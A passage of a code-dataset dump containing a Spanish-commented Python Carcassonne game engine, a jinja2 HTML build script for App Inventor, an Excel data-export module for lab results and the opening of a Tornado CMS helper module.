jugadores):\n if not self.num_jug_correcto(jugadores):\n return \"Numero de jugadores incorrecto. Solo pueden jugar entre 2 y 4 personas\"\n nombres_jugadores = self.devuelve_nombres_jugadores(jugadores)\n if not self.nombres_jug_correcto(nombres_jugadores):\n return \"No se puede repetir el nombre de dos jugadores\"\n self.turno = 0\n jugador_mas_joven = self.jugador_mas_joven(jugadores)\n self.jugadores = self.inicializar_jugadores_en_orden(jugador_mas_joven, jugadores)\n self.baraja = self.inicializar_baraja() # baraja = fichas que aun se pueden jugar\n random.shuffle(self.baraja) # aleatorizo la baraja\n self.tablero = self.inicializar_tablero() # tablero = fichas que ya se han jugado\n self.caminos_encontrados = [] # lista con los caminos que se completaron\n self.monasterios_encontrados = [] # lista con los caminos ya completados\n self.lista_turnos = self.asignar_turnos(self.jugadores) # orden de los turnos de los jugadores\n return self\n\n # Busca el indice en el que se encuentra el jugador que se pasa en self.jugadores\n def buscar_ind_jugador(self, jugador_buscado):\n indice = None\n for i in range(len(self.jugadores)):\n if self.jugadores[i].nombre == jugador_buscado:\n indice = i\n return indice\n\n # Suma uno al turno de la partida y devuelve el jugador que juega ese turno\n def jugador_turno(self):\n self.turno += 1\n jugador_buscado = self.lista_turnos[self.turno-1]\n jugador = self.jugadores[self.buscar_ind_jugador(jugador_buscado.nombre)]\n return jugador\n\n # Saca una pieza de la baraja\n def sacar_pieza(self):\n pieza_sacada= []\n pieza_sacada = self.baraja[self.turno-1]\n self.baraja.pop(self.turno-1)\n return pieza_sacada\n\n #Funcion para obtener cual es la pieza que ya esta en el tablero\n def ver_pieza_tablero (self, coords):\n tablero = self.tablero\n for j in range(len(tablero)):\n if coords == tablero[j].coordenadas:\n pieza_tablero = tablero[j]\n break\n else:\n pieza_tablero = []\n return pieza_tablero\n\n def se_puede_poner_norte (self, pieza_norte, pieza_colocar):\n if (pieza_norte == []):\n return True\n elif (pieza_norte.posicion[4] == pieza_colocar.posicion[0]):\n return True\n else:\n return False\n\n def se_puede_poner_este (self, pieza_este, pieza_colocar):\n if (pieza_este == []):\n return True\n elif (pieza_este.posicion[6] == pieza_colocar.posicion[2]):\n return True\n else:\n return False\n\n def se_puede_poner_sur(self, pieza_sur, pieza_colocar):\n if (pieza_sur == []):\n return True\n elif (pieza_sur.posicion[0] == pieza_colocar.posicion[4]):\n return True\n else:\n return False\n def se_puede_poner_oeste(self, pieza_oeste, pieza_colocar):\n if (pieza_oeste == []):\n return True\n elif (pieza_oeste.posicion[2] == pieza_colocar.posicion[6]):\n return True\n else:\n return False\n\n # Funcion para comprobar si se puede colocar una pieza en la posicion requerida o no.\n def poner_pieza (self, pieza_colocar, coordenadas_colocar):\n coord_x = coordenadas_colocar[0]\n coord_y = coordenadas_colocar[1]\n pieza_norte = self.ver_pieza_tablero([coord_x, coord_y+1])\n pieza_oeste = self.ver_pieza_tablero([coord_x-1, coord_y])\n pieza_sur = self.ver_pieza_tablero([coord_x, coord_y-1])\n pieza_este = self.ver_pieza_tablero([coord_x+1, coord_y])\n comprobar_pieza = self.ver_pieza_tablero([coord_x,coord_y])\n if comprobar_pieza != []:\n return False\n elif (self.se_puede_poner_norte(pieza_norte, pieza_colocar) and self.se_puede_poner_este(pieza_este, pieza_colocar) and self.se_puede_poner_sur(pieza_sur, pieza_colocar) and self.se_puede_poner_oeste(pieza_oeste, pieza_colocar)) and (pieza_norte != [] or pieza_este !=[] or pieza_sur !=[] or pieza_oeste !=[]):\n pieza_colocar.jugador = self.jugadores[self.turno % len(self.jugadores)-1]\n pieza_colocar.coordenadas = coordenadas_colocar\n self.tablero.append(pieza_colocar)\n else:\n return False\n\n #Introducir meeple en la ultima ficha del tablero\n def introducir_meeple(self,posicion_meeple):\n jugador = self.jugadores[self.turno % len(self.jugadores)-1]\n if jugador.meeples > 0:\n self.tablero[-1].meeples = posicion_meeple\n jugador.meeples -= 1\n self.jugadores[self.turno % len(self.jugadores)-1] = jugador\n return True\n else:\n return False\n\n # Busca las piezas que tienen un tipo determinado en alguno de sus lados\n def buscar_tipo_en_tablero(self, tipo):\n tablero = self.tablero\n piezas_tipo = []\n for k in range(len(tablero)):\n if tipo in tablero[k].posicion:\n piezas_tipo.append(tablero[k])\n return piezas_tipo\n\n\n def comprobar_cierre_monasterio(self):\n monasterios = self.buscar_tipo_en_tablero(\"Monasterio\")\n self.sumar_puntos_monasterio(monasterios)\n\n # Suma los puntos en el caso de que se haya completado un monasterio que se pasa como argumento\n def sumar_puntos_monasterio(self, piezas_monasterio):\n puntos = 0\n for mon in range(len(piezas_monasterio)):\n if not (piezas_monasterio[mon] in self.monasterios_encontrados):\n nombre_jugador = piezas_monasterio[mon].jugador.nombre\n ind_jugador = self.buscar_ind_jugador(nombre_jugador)\n jugador_monasterio = self.jugadores[ind_jugador]\n coorx = piezas_monasterio[mon].coordenadas[0]\n coory = piezas_monasterio[mon].coordenadas[1]\n if(self.ver_pieza_tablero([coorx,coory-1]) != [] and self.ver_pieza_tablero([coorx,coory+1]) != [] and self.ver_pieza_tablero([coorx-1,coory]) != [] and self.ver_pieza_tablero([coorx+1,coory]) != []):\n # Suma 9 puntos por tener un monasterio completo\n puntos = 9\n jugador_monasterio.actualizar_puntuacion(puntos)\n self.jugadores[ind_jugador] = jugador_monasterio\n self.monasterios_encontrados.append(piezas_monasterio[mon])\n\n # Devuelve el/los jugador/es que mas meeples tienen en una lista de piezas que se le pasa\n def jugadores_con_mas_meeples(self, piezas, tipo_terreno):\n jugadores = []\n nombres_jugadores = [] # array con los nombres de los jugadores con meeple (se pueden repetir)\n for pieza in piezas:\n posiciones = pieza.posicion_tipo_terreno_en_pieza(tipo_terreno)\n if pieza.meeples in posiciones:\n nombres_jugadores.append(pieza.jugador.nombre)\n if len(nombres_jugadores) > 1:\n # Si hay mas de un jugador con meeples me quedo con el que mas tenga\n freq = collections.Counter(nombres_jugadores).values()\n max_freq = max(freq)\n total = freq.count(max_freq)\n mas_comun = collections.Counter(nombres_jugadores).most_common(total)\n nombres_jugadores = [elem[0] for elem in mas_comun] # ahora ya no estan repetidos\n # Introduzco el objeto de cada jugador en jugadores\n for nombre in nombres_jugadores:\n ind_jugador = self.buscar_ind_jugador(nombre)\n jugadores.append(self.jugadores[ind_jugador])\n return jugadores\n\n # Funcion que busca la pieza conectada a la que se pasa como argumento de un tipo de terreno concreto\n def evaluar_siguiente(self,pieza_actual,posicion_actual,tipo_terreno):\n pieza_siguiente = []\n num_pos_siguiente = None\n posicion_siguiente = None\n coord_x = pieza_actual.coordenadas[0]\n coord_y = pieza_actual.coordenadas[1]\n if posicion_actual == 0:\n coord_y += 1\n tmp = 4 # posicion de la siguiente a la que se conecta la actual\n elif posicion_actual == 2:\n coord_x += 1\n tmp = 6 # si es Este se conecta a la siguiente por Oeste\n elif posicion_actual == 4:\n coord_y -= 1\n tmp = 0\n elif posicion_actual == 6:\n coord_x -= 1\n tmp = 2\n else:\n return pieza_siguiente, num_pos_siguiente, posicion_siguiente\n pieza_siguiente = self.ver_pieza_tablero([coord_x,coord_y])\n if pieza_siguiente != []:\n posiciones_siguiente = pieza_siguiente.posicion_tipo_terreno_en_pieza(\"Camino\")\n num_pos_siguiente = len(posiciones_siguiente)\n # Me quedo con la posicion del otro lado en el caso de que dos lados sean Camino\n if num_pos_siguiente == 2:\n for posicion in posiciones_siguiente:\n if posicion != tmp:\n posicion_siguiente = posicion\n return pieza_siguiente, num_pos_siguiente, posicion_siguiente\n\n\n # Funcion que busca si una pieza del camino forma parte de un camino cerrado\n def buscar_caminos_cerrados(self, pieza):\n posiciones = pieza.posicion_tipo_terreno_en_pieza(\"Camino\")\n max_caminos_posibles = [1, 1, 3, 4]\n caminos = []\n for ind_camino in range(max_caminos_posibles[len(posiciones)-1]):\n piezas_camino = [] # piezas que forman el camino\n terminaciones = [] # piezas que terminan el camino\n pieza_actual = pieza\n num_pos_actual = len(posiciones)\n posicion_actual = posiciones[ind_camino]\n while pieza_actual != []:\n piezas_camino.append(pieza_actual)\n if num_pos_actual != 2:\n terminaciones.append(pieza_actual)\n if len(terminaciones) < 2:\n pieza_actual,num_pos_actual,posicion_actual = self.evaluar_siguiente(pieza_actual,posicion_actual,\"Camino\")\n else:\n break;\n if len(terminaciones)==2:\n piezas_camino.sort(key=lambda x: (x.coordenadas[0],x.coordenadas[1]))\n caminos.append(piezas_camino)\n return caminos\n\n # Comprueba si algun camino se ha cerrado\n def comprobar_cierre_camino(self):\n caminos = self.buscar_tipo_en_tablero(\"Camino\")\n for pieza_camino in caminos:\n # Para cada pieza de camino compruebo si participa en algun camino ya cerrado\n piezas_caminos = self.buscar_caminos_cerrados(pieza_camino) # devuelve lista de caminos cerrados\n for piezas_camino in piezas_caminos:\n # Para cada camino cerrado, si no estaba ya contado lo introduzco y sumo la puntuacion\n if (piezas_camino != []) and not (piezas_camino in self.caminos_encontrados):\n self.caminos_encontrados.append(piezas_camino)\n jugadores = self.jugadores_con_mas_meeples(piezas_camino,\"Camino\")\n for jugador in jugadores:\n # A cada jugador le sumo la puntuacion y le devuelvo los meeples\n ind_jugador = self.buscar_ind_jugador(jugador.nombre)\n self.jugadores[ind_jugador].actualizar_puntuacion(len(piezas_camino))\n self.jugadores[ind_jugador].meeples += 1\n\n #Metodos para buscar castillos cerrados(recursivo)\n def es_castillo(self,pieza):\n #posibles_castillos = self.buscar_tipo_en_tablero(\"Castillo\")\n pieza_siguiente = None\n encontrado = False\n castillo = False\n posiciones = pieza.posicion_tipo_terreno_en_pieza2(\"Castillo\")\n coord_x = pieza.coordenadas[0]\n coord_y = pieza.coordenadas[1]\n piezas_totales = []\n piezas_castillos = []\n if posiciones == []:\n return False\n else:\n piezas_totales.append(pieza)\n for i in posiciones:\n pieza_inicio = pieza\n if i == 1:\n #inicio == 1\n coord_x2 = coord_x +1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y +1\n pieza_siguiente2 = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas_totales)\n\n if pieza_siguiente2 != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas_totales)\n else:\n if pieza.tipo != 9:\n if pieza.tipo !=15:\n castillo = False\n break\n\n\n if i == 3:\n coord_x2 = coord_x +1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y -1\n pieza_siguiente = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas_totales)\n\n elif pieza_siguiente != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas_totales)\n else:\n\n if pieza.tipo != 9:\n if pieza.tipo !=15:\n castillo = False\n break\n if i == 5:\n coord_x2 = coord_x - 1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y -1\n pieza_siguiente2 = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas_totales)\n\n elif pieza_siguiente2 != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas_totales)\n else:\n a=1\n\n\n if pieza.tipo != 9:\n if pieza.tipo !=15:\n castillo = False\n break\n if i == 7:\n #inicio == 7\n coord_x2 = coord_x - 1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y +1\n pieza_siguiente = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas_totales)\n\n elif pieza_siguiente2 != []:\n piezas_totales,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas_totales)\n else:\n a=1\n\n if pieza.tipo != 9:\n if pieza.tipo !=15:\n castillo = False\n break\n\n if castillo == True: #Castillo cerrado\n numero_piezas = len(piezas_totales)\n self.piezas_castillos = piezas_totales\n break\n return castillo,(piezas_totales)\n\n\n\n def buscar_castillos(self,pieza_inicio,pieza,piezas):\n posiciones = pieza.posicion_tipo_terreno_en_pieza2(\"Castillo\")\n castillo = False\n if posiciones == []:\n return False\n else:\n for m,k in enumerate(piezas):\n if (k!= pieza) & (len(piezas)-1 == m) :\n piezas.append(pieza)\n for j,i in enumerate(posiciones):\n piezas, castillo, pieza_inicio =self.casos(pieza,piezas,i,pieza_inicio,j)\n return piezas,castillo,pieza_inicio\n\n\n def casos(self,pieza,piezas,i,pieza_inicio,j):\n posiciones = pieza.posicion_tipo_terreno_en_pieza2(\"Castillo\")\n analizar = True\n castillo = False\n coord_x = pieza.coordenadas[0]\n coord_y = pieza.coordenadas[1]\n if i == 1:\n #inicio == 1\n coord_x2 = coord_x +1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y +1\n pieza_siguiente2 = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n for k in piezas:\n if k== pieza_siguiente:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas.append(pieza)\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas)\n\n if pieza_siguiente2 != []:\n for k in piezas:\n if k== pieza_siguiente2:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas)\n else:\n castillo = False\n\n if i == 3:\n\n coord_x2 = coord_x +1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y -1\n pieza_siguiente2 = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n for k in piezas:\n if k== pieza_siguiente:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas)\n\n elif pieza_siguiente2 != []:\n for k in piezas:\n if k== pieza_siguiente2:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas)\n else:\n castillo = False\n if i == 5:\n coord_x2 = coord_x - 1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y -1\n pieza_siguiente2 = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n for k in piezas:\n if k== pieza_siguiente:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente,piezas)\n\n if pieza_siguiente2 != []:\n for k in piezas:\n if k== pieza_siguiente2:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_inicio,pieza_siguiente2,piezas)\n else:\n castillo = False\n if (j == 7):\n #inicio == 7\n coord_x2 = coord_x - 1\n pieza_siguiente = self.ver_pieza_tablero([coord_x2,coord_y])\n coord_y2 = coord_y +1\n pieza_siguiente2 = self.ver_pieza_tablero([coord_x,coord_y2])\n if pieza_siguiente != []:\n for k in piezas:\n if k== pieza_siguiente:\n analizar = False\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == True:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_siguiente,piezas)\n\n elif pieza_siguiente2 != []:\n for k in piezas:\n if k== pieza_siguiente2:\n analizar = True\n if (k == pieza_inicio) & (len(posiciones)-1 ==j):\n castillo= True\n if analizar == False:\n piezas,castillo,pieza_inicio = self.buscar_castillos(pieza_siguiente2,piezas)\n else:\n castillo = False\n return piezas, castillo, pieza_inicio\n\n\n #Contabilizar puntos por castillos cerrados\n def puntuacion_castillos(self,piezas,castillo):\n jugadores = []\n jugadores1 = []\n if castillo == True:\n for pieza in piezas:\n if pieza.meeples != None:\n jugadores.append(pieza.jugador)\n if len(jugadores) == 1:\n if len(piezas)>2:\n puntos = 2*len(piezas)\n else:\n puntos = 2\n jugadores[0].actualizar_puntuacion(puntos)\n jugadores[0].meeples += 1\n else:\n j_mas_meeples = jugadores_con_mas_meeples(piezas, 'Castillo')\n if len(j_mas_meeples)>1:\n for jugadores in j_mas_meeples:\n jugadores.actualizar_puntuacion(10)\n jugadores.meeples += 1\n else:\n if len(piezas)>2:\n puntos = 2*len(piezas)\n else:\n puntos = 2\n jugadores[0].actualizar_puntuacion(puntos)\n jugadores.meeples += 1\n\n\n # Comprueba los cierres de los distintos tipos de terreno al final de cada turno\n def comprobar_cierres(self):\n self.comprobar_cierre_monasterio()\n self.comprobar_cierre_camino()\n\n # Comprueba el/los jugador/es con mas meeples en granjas y le suma diez puntos\n def comprobar_cierre_granjas(self):\n jugadores = self.jugadores_con_mas_meeples(self.tablero, \"Granja\")\n for jugador in jugadores:\n ind_jugador = self.buscar_ind_jugador(jugador.nombre)\n self.jugadores[ind_jugador].actualizar_puntuacion(10)\n\n # Ordenar los jugadores en funcion de la puntuacion de cada uno de ellos\n def orden_jugadores_ptos(self,lista_jugadores):\n lista_jugadores_aux = sorted(lista_jugadores, key = lambda objeto: objeto.puntuacion, reverse = True)\n return lista_jugadores_aux\n\nclass Jugador:\n\n # Inicializa la clase jugador\n def __init__(self, nombre):\n self.nombre = nombre\n self.meeples = 8 # meeples disponibles\n self.puntuacion = 0\n self.edad = 0\n\n\n #Actualizar puntuacion\n def actualizar_puntuacion(self, puntos):\n self.puntuacion += puntos\n return self\n\n #G Cambiar nombre\n def cambiar_nombre(self, nombre):\n self.nombre = nombre\n\n #G Asignar edad\n def asignar_edad(self, edad):\n self.edad = edad\n\nclass Pieza_terreno:\n\n # Devuelve los indices de posicion en los que coincide el tipo de terreno\n # que se pasa como argumento\n def posicion_tipo_terreno_en_pieza(self,tipo_terreno):\n indices_posicion = []\n # Elimino las esquinas en el caso del camino\n if tipo_terreno == \"Granja\":\n posicion = self.posicion[0:7]\n for i in range(len(posicion)):\n if posicion[i] == tipo_terreno:\n indices_posicion.append(i)\n else:\n posicion = self.posicion[0:7:2]\n for i in range(len(posicion)):\n if posicion[i] == tipo_terreno:\n indices_posicion.append(i*2)\n # Me quedo con aquellos indices en los que coincida el tipo de terreno\n return indices_posicion\n\n # Devuelve todos los indices de posicion en los que coincide el tipo de terreno\n # que se pasa como argumento\n def posicion_tipo_terreno_en_pieza2(self,tipo_terreno):\n # Elimino las esquinas\n posicion = self.posicion\n # Me quedo con aquellos indices en los que coincida el tipo de terreno\n indices_posicion = []\n for i in range(len(posicion)):\n if posicion[i] == tipo_terreno:\n indices_posicion.append(i)\n return indices_posicion\n\n\n # Repite cada pieza el numero de veces que aparezca en el juego original\n def repetir_pieza(self):\n if self.tipo == 1:\n pieza_repetida = 9*[self]\n elif self.tipo == 2:\n pieza_repetida = 8*[self]\n elif self.tipo == 3:\n pieza_repetida = 5*[self]\n elif self.tipo == 4:\n pieza_repetida = 5*[self]\n elif self.tipo == 5:\n pieza_repetida = 5*[self]\n elif self.tipo == 6:\n pieza_repetida = 4*[self]\n elif self.tipo == 7:\n pieza_repetida = 4*[self]\n elif self.tipo == 8:\n pieza_repetida = 4*[self]\n elif self.tipo == 9:\n pieza_repetida = 3*[self]\n elif self.tipo == 10:\n pieza_repetida = 3*[self]\n elif self.tipo == 11:\n pieza_repetida = 3*[self]\n elif self.tipo == 12:\n pieza_repetida = 3*[self]\n elif self.tipo == 13:\n pieza_repetida = 3*[self]\n elif self.tipo == 14:\n pieza_repetida = 3*[self]\n elif self.tipo == 15:\n pieza_repetida = 3*[self]\n elif self.tipo == 16:\n pieza_repetida = 2*[self]\n elif self.tipo == 17:\n pieza_repetida = 2*[self]\n elif self.tipo == 18:\n pieza_repetida = 1*[self]\n elif self.tipo == 19:\n pieza_repetida = 1*[self]\n return pieza_repetida\n\n # Asigna los distintos tipos de territorios al atributo posicion. El array se\n # corresponderia con la parte ['Norte','Noreste','Este','Sureste','Sur','Suroeste','Oeste','Noroeste','Centro'] de la pieza\n def asignar_posicion(self, tipo):\n if tipo == 1:\n posicion = ['Granja','Granja','Granja','Granja','Camino','Granja','Camino','Granja','']\n elif tipo == 2:\n posicion = ['Camino','Granja','Granja','Granja','Camino','Granja','Granja','Granja','']\n elif tipo == 3:\n posicion = ['Castillo','Castillo','Camino','Granja','Camino','Castillo','Castillo','Castillo','']\n elif tipo == 4:\n posicion = ['Castillo','Castillo','Granja','Granja','Granja','Castillo','Castillo','Castillo','']\n elif tipo == 5:\n posicion = ['Granja','Castillo','Castillo','Castillo','Granja','Granja','Granja','Granja','']\n elif tipo == 6:\n posicion = ['Castillo','Castillo','Castillo','Castillo','Granja','Castillo','Castillo','Castillo','']\n elif tipo == 7:\n posicion = ['Granja','Granja','Camino','Granja','Camino','Granja','Camino','Granja','']\n elif tipo == 8:\n posicion = ['Granja','Granja','Granja','Granja','Granja','Granja','Granja','Granja','Monasterio']\n elif tipo == 9:\n posicion = ['Granja','Castillo','Castillo','Castillo','Granja','Castillo','Castillo','Castillo','']\n elif tipo == 10:\n posicion = ['Camino','Castillo','Castillo','Castillo','Camino','Granja','Granja','Granja','']\n elif tipo == 11:\n posicion = ['Camino','Castillo','Castillo','Castillo','Camino','Granja','Camino','Granja','']\n elif tipo == 12:\n posicion = ['Castillo','Castillo','Castillo','Castillo','Camino','Castillo','Castillo','Castillo','']\n elif tipo == 13:\n posicion = ['Castillo','Castillo','Camino','Granja','Camino','Granja','Granja','Castillo','']\n elif tipo == 14:\n posicion = ['Camino','Castillo','Castillo','Castillo','Granja','Granja','Camino','Granja','']\n elif tipo == 15:\n posicion = ['Castillo','Castillo','Granja','Castillo','Castillo','Castillo','Granja','Castillo','']\n elif tipo == 16:\n posicion = ['Granja','Castillo','Castillo','Castillo','Castillo','Castillo','Granja','Granja','']\n elif tipo == 17:\n posicion = ['Granja','Granja','Granja','Granja','Camino','Granja','Granja','Granja','Monasterio']\n elif tipo == 18:\n posicion = ['Camino','Granja','Camino','Granja','Camino','Granja','Camino','Granja','']\n elif tipo == 19:\n posicion = ['Castillo','Castillo','Castillo','Castillo','Castillo','Castillo','Castillo','Castillo','']\n return posicion\n\n # Inicializa la clase pieza territorio\n def __init__(self, tipo):\n self.tipo = tipo\n # Posicion = ['Norte','Noreste','Este','Sureste','Sur','Suroeste','Oeste','Noroeste','Centro']\n self.posicion = self.asignar_posicion(tipo)\n # Coordenada X y coordenada Y\n self.coordenadas = [None,None]\n # Si no hay ningun meeple colocado, self.meeples = None. Si lo hay,\n # self.meeples toma el valor de la parte en la que se coloca:\n # 0: norte, 1: noreste, 2: este, 3:sureste, 4: sur, 5: suroeste, 6: oeste, 7: noroeste, 8: Centro\n self.meeples = None\n # Jugador que ha colocado la pieza\n self.jugador = None\n","sub_path":"carcassonne.py","file_name":"carcassonne.py","file_ext":"py","file_size_in_byte":35693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"286874596","text":"import os\nimport jinja2\nimport re\nimport json\n\n\ndef sub_urls(contents):\n\treturn re.sub(r\"(href|src)=\\\"((?!http)[^/].+)\\\"\", \"\\\\g<1>=\\\"http://localhost/\\\\g<2>\\\"\", contents)\n\n\ndef render_template(contents, cfg):\n\ttemplate = jinja2.Template(contents)\n\tcontents = template.render(**cfg)\n\n\tcontents = sub_urls(contents)\n\n\treturn contents\n\n\ndef render(getpath, putpath, midfunc, *args):\n\tif getpath.endswith(\".html\"):\n\t\twith open(getpath, \"r\", encoding=\"utf8\") as f:\n\t\t\tcontents = f.read()\n\n\t\tcontents = midfunc(contents, *args)\n\n\t\twith open(putpath, \"w\", encoding=\"utf8\") as f:\n\t\t\tf.write(contents)\n\nRESERVED_DIRS = [ \"!templates\", \"!template_vals\" ]\n\ndef build(src=\"src\", dest=\"build\"):\n\t\"\"\"\n\tThis is designed to make it easier to format files to export them to App Inventor.\n\n\tEvery template in the templates folder should have a corresponding json file of the same name in the templates folder which will be used to\n\trender the template with jinja2\n\n\t\"\"\"\n\tif not os.path.isdir(dest):\n\t\tos.mkdir(dest)\n\n\tfor filename in os.listdir(src):\n\t\tget_path = f\"{src}/{filename}\"\n\t\tput_path = f\"{dest}/{filename}\"\n\n\t\tif os.path.isfile(get_path):\n\t\t\tif filename.endswith(\".html\"):\n\t\t\t\trender(get_path, put_path, sub_urls)\n\t\t\telse:\n\t\t\t\twith open(get_path, \"rb\") as r, open(put_path, \"wb\") as w:\n\t\t\t\t\tw.write(r.read())\n\n\ttemplate_path = f\"{src}/!templates\"\n\tif os.path.isdir(template_path):\n\t\tfor filename in os.listdir(template_path):\n\t\t\tput_path = f\"{dest}/{filename}\"\n\t\t\tget_path = f\"{src}/!templates/{filename}\"\n\t\t\tget_cfg_path = f\"{src}/!template_vals/{'.'.join(filename.split('.')[:-1])}.json\"\n\n\t\t\twith open(get_cfg_path, \"r\", encoding=\"utf8\") as f:\n\t\t\t\tcfg = json.load(f)\n\n\t\t\trender(get_path, put_path, render_template, cfg)\n\n\tfor dir in os.listdir(src):\n\t\tpath = f\"{src}/{dir}\"\n\n\t\tif not os.path.isdir(path) or dir in RESERVED_DIRS:\n\t\t\tcontinue\n\n\t\tbuild(path) # Recursive for folders inside the build\n\n\nif __name__ == \"__main__\":\n\tbuild()\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"402657268","text":"from openpyxl import load_workbook\nimport xlsxwriter\nimport pandas as pd\nfrom dsp.save_data import get_output_fpath, save_param_info\nfrom extra.lr_sig import LrSig\n\n\nclass SaveRawData:\n def __init__(self, filepath, dsp, epr_df, rv_dict, version_info, is_dev):\n self.filepath = filepath\n self.params = dsp.parameters\n self.epr_df = epr_df\n self.rv_dict = rv_dict\n self.res_dict = dsp.result_data_dict_raw\n self.version_info = version_info\n self.is_dev = is_dev\n self.lr = LrSig(dsp.result_dict_fi, self.params, dsp.data_raw_dic)\n\n def export_raw_datasheet(self):\n self.fpath = get_output_fpath(self.filepath, 'raw_datasheet_')\n with xlsxwriter.Workbook(self.fpath) as writer:\n save_param_info(writer, self.params, self.res_dict,\n self.version_info, is_dev=self.is_dev)\n self.save_res_data()\n\n def get_lssig(self):\n self.lr.calculate_lrsig()\n self.lr_res_dic = {}\n for d in self.params['dye_li']:\n self.lr_res_dic[d] = []\n for param, dic1 in self.lr.lr_dict.items():\n for temp, dic2 in dic1.items():\n for dye, dic3 in dic2.items():\n srs_name = f'{param.upper()} ({temp[0]})'\n self.lr_res_dic[dye].append(\n pd.Series(list(dic3.values()), index=dic3.keys(),\n name=srs_name))\n\n def save_res_data(self):\n with pd.ExcelWriter(self.fpath, engine='openpyxl') as writer:\n book = load_workbook(self.fpath)\n writer.book = book\n temp_keys = list(self.params['used_temp'].keys())\n dye_li = []\n for d in self.params['dye_li']:\n if self.params['used_temp'][temp_keys[0]][d] or\\\n self.params['used_temp'][temp_keys[1]][d]:\n dye_li.append(d)\n for dye in dye_li:\n data_table_li = []\n for i, txt in enumerate(['End RFU (L)', 'End RFU (H)']):\n data_table_li.append(\n pd.Series([\n round(absd[-1]) for absd in self.res_dict[\n 'ABSD_array'][temp_keys[i]][dye].values()],\n index=self.res_dict[\n 'ABSD_array'][temp_keys[i]][dye].keys(),\n name=txt)\n )\n for i, txt in enumerate(['RV (L)', 'RV (H)']):\n data_table_li.append(\n pd.Series([round(rv) for rv in self.rv_dict[\n temp_keys[i]][dye].values()], index=self.rv_dict[\n temp_keys[i]][dye].keys(), name=txt)\n )\n self.get_lssig()\n data_table_li.extend(self.lr_res_dic[dye])\n\n data_table_df = pd.concat(data_table_li, axis=1, sort=True)\n data_table_df.insert(\n 4, 'EPR',\n data_table_df['End RFU (L)']/data_table_df['End RFU (H)'])\n data_table_df.fillna('')\n data_table_df.to_excel(writer, sheet_name=dye)\n","sub_path":"dsp/save_raw_datasheet.py","file_name":"save_raw_datasheet.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"420556434","text":"# coding:utf8\n\nfrom util.check_fields_util import get_mutual_params\nfrom view.service.service_utils import do_service_command\nfrom datetime import datetime, timedelta\nfrom tornado.web import RequestHandler, Finish\nfrom util.utils import get_remote_ip, json_dumps_util, json_loads_utf8_util\nfrom view.service.service_utils import del_redis_cache\nimport re\nimport os\nfrom util.config_utils import get_config\nfrom settings_cms import (\n COOKIES_KWARGS, SESSION_VALID_TIME, COOKIE_KEY, LOGIN_PATH\n)\nfrom settings_cms import USER_FILES_PATH, STATIC_FILES_PATH, TEST_USER, BASE_DIR\nfrom tornado import template\n\n\ndef get_command_func_dict(pattern, module_ls=list()):\n command_func_dict = dict()\n for module in module_ls:\n module_dict = module.__dict__\n for key in module_dict:\n r = re.search(pattern, key)\n if r:\n command_func_dict[r.group(1)] = module_dict[key]\n return command_func_dict\n\n\nclass ParamsInfo(object):\n def __init__(self, req, user, content, command):\n super(ParamsInfo, self).__init__()\n self.login_id = user.get('user_id', '')\n 